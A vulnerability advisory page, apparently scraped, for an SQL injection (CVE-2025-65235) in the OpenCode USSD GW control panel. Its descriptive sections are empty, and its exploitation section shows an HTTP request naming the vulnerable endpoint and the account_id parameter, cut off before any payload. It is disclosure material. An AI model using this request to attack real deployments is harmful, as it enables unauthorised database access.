[CVE-2025-65235] USSD GW SQL Injection - SubUsers
Technical information about the CVE-2025-65235 in OpenCode USSD GW application.
Description
Application Details
Technical Details
Exploitation
POST /occontrolpanel/index.php?w=occampaigns&op=SubUsers&op_func=getSubUsersByProvider HTTP/2
Host: DOMAIN
Cookie: OCPANEL-SESSIONID=9j[...]fmla; openid-state=65c[...]pao%22%3B%7D; _csrf=8643[...]63a_A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
[...]
account_id=1Nuclei Template
Previous[CVE-2021-34786] Cisco BroadWorks - Delete Admin AccountNext[CVE-2025-65236] USSD Gateway SQL Injection - Sessions
Last updated